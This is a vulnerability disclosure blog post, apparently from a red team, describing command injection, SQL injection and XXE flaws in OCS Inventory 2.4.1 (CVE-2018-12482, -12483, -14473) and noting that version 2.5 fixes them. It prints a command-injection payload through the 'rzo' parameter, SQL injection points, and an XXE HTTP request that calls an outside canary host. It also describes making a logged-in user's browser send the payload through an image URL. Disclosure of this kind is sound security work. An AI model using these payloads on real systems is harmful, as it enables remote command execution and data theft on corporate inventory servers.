During a Red Team operation, multiple vulnerabilities were discovered in OCS Inventory (version 2.4.1). The following CVEs have been assigned to the vulnerabilities:

CVE-2018-12482 (Multiple SQL Injections in the search engine)

CVE-2018-12483 (Remote Command Execution)

CVE-2018-14473 (XXE).

Introduction

OCS Inventory is a inventory software widely used in corporations to monitor their computers via agents (for Linux and Windows) that are deployed inside the machines. The agents collect information from the computers and send it to a HTTP endpoint located in a master server. Likewise, in addition to monitoring, OCS Inventory allows the installation of software and the execution of OS commands from the master server to the computers where an agent is installed. Due to these capabilities, this product becomes a critical asset and therefore an asset of special interest for an attacker. If the OCS Inventory server gets compromised the attacker would be able deploy any kind of software inside the machines where an agent is deployed.

In the operation, the Red Team identified the existence of this software inside the client network, so, the logical procedure was to install a local copy of OCS Inventory to analyze it’s inner workings and to uncover vulnerabilities that could be used in the operation.

CVE-2018-12483 – Remote Command Execution

When the code of “OCSReports” component is analyzed, the use of an external perl script for IP discovery is quickly observed:

function runCommand($command = "", $fname) { $command = "perl ipdiscover-util.pl $command -xml -h=" . SERVER_READ . " -u=" . COMPTE_BASE . " -p=" . PSWD_BASE . " -d=" . DB_NAME . " -path=" . $fname; exec($command); }

The perl script is executed as a system command via exec() function, where it takes as argument a text string where the parameters have been concatenated. If we proceed to the search of references to this function within the source code, a unique match is identified:

//ms_ipdiscover_analyse.php $pas = $protectedGet['rzo']; $values = look_config_default_values(array('IPDISCOVER_IPD_DIR'), '', array('IPDISCOVER_IPD_DIR' => array('TVALUE' => VARLIB_DIR))); $fname = $values['tvalue']['IPDISCOVER_IPD_DIR']; $file_name = $fname . "/ipd/" . $pas . ".ipd"; //reset cache? if (is_defined($protectedPost['reset'])) { unlink($file_name); reloadform_closeme('', true); } else { if (!is_readable($file_name)) runCommand("-cache -net=" . $pas, $fname);

The parameters provided to the runCommand function lack any filtering, so it is possible to abuse this functionality in order to execute arbitrary commands in the OS. Since we have the control of $pas (as it acquires its value from the GET parameter “rzo”), we can insert commands by the creation of a string like this one:

perl ipdiscover-util.pl -cache -net=;id > /tmp/pwned;#-xml -h=...

For the exploitation of this vulnerability it is necessary to be authenticated in the web platform, so if a valid user is not available another option is to hijack a session via the explotation of any XSS from the myriad it has. In the context of the RedTeam exercise where the vulnerability was discovered, it was decided to force an authenticated user to load in their browser an image pointing to an URL with the payload (the browser sends a GET request with the malicious payload when the image is viewed).

CVE-2018-12482 – Multiple SQL Injections

The search engine implemented in OCS Inventory does not perform an adequate filtering of the parameters used within SQL statements, making it possible to inject arbitrary SQL code. For highlighting some injection points:

GET and POST parameter “values” when searching from the section “Inventory -> Search with various criteria data”. When you select a search tag (for example “Network: IPADDRESS”), the SQL statement remains such that:

select distinct HARDWARE_ID,networks.DESCRIPTION as 'Network: Description',networks.TYPE as 'Network: Type',networks.TYPEMIB as 'Network: MibType',networks.SPEED as 'Network: Speed',networks.MACADDR as 'Network: MAC Address',networks.STATUS as 'Network: Status',networks.IPADDRESS as 'Network: IP Address',networks.IPMASK as 'Network: IP Netmask',networks.IPSUBNET as 'Network: Subnetwork IP',networks.IPGATEWAY as 'Network: Gateway IP',networks.IPDHCP as 'Network: DHCP IP' from networks where ( ( IPADDRESS = '[INJECT HERE]'))

By not filtering properly, we can break the sentence with a single quote (‘) and inject our payload.

Parameters length, order and start. These parameters used for the limit and order clauses of the SQL statement are not filtered properly, allowing the execution of arbitrary queries in the same way:

(Example: POST parameter length) ... GROUP BY netid) non_ident on non_ident.RSX=inv.RSX) toto order by ID asc limit 0 ,[inject here]

CVE-2018-14473 – XXE

The communication between the agents and the master server of OCS Inventory is done through the HTTP protocol, sending the information against an endpoint. The information is structured in the form of XML, being parsed by the server to extract the data. Due to an inadequate configuration it is possible to use external entities, which when processed by the XML parser, allow the exfiltration of sensitive information from the machine.

As proof of concept, a local web server can be raised on the user’s machine, as a canary, and send the following request against the endpoint:

POST /ocsinventory HTTP/1.1 Host: xxxxxxxxxxxxxxx User-Agent: OCS-NG_WINDOWS_AGENT_v2.3.1.1 Accept: */* Content-Type: application/xml Content-Length: 160 Expect: 100-continue Connection: close <?xml version="1.0" encoding=""UTF-8" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY sp SYSTEM "https://ourserver/?pwned"> > <REQUEST>&sp;</REQUEST>

When the XML is processed, the entity &sp; expands and the OCS Inventory server makes a request against our canary, verifying the existence of the vulnerability.

Conclusion

One of the most standout characteristics of Tarlogic’s Red Team is It’s dedication to analyze the software used by It’s clients in order to find vulnerabilities that can be exploited in a real life scenario.These activities result in many occasions in the discovery of 0-days. Some of them that are found to be more interesting are shown in this blog (like the present post, or as was done with the RCE of Cobian Backup, and others are only reported to the pertinent authorities (as was done with the Switch UbiQuoss VP5208A).

Always consider the possibility that an attacker uses unpublished vulnerabilities to compromise a machine. It is at this point where the measures implemented during the bastion phase should make lateral movement and escalation of privileges more difficult or even impossible. Likewise, the implementation of WAFs in this type of critical internal applications can prevent or make much more complicated to exploit this kind of vulnerabilities in web applications.

OCS Inventory has released a new version (2.5) to fix the issues

Greetings

Jaume Llopis (@jks___), Pablo Martínez (@Xassiz) and Juan Manuel Fernández (@TheXC3LL)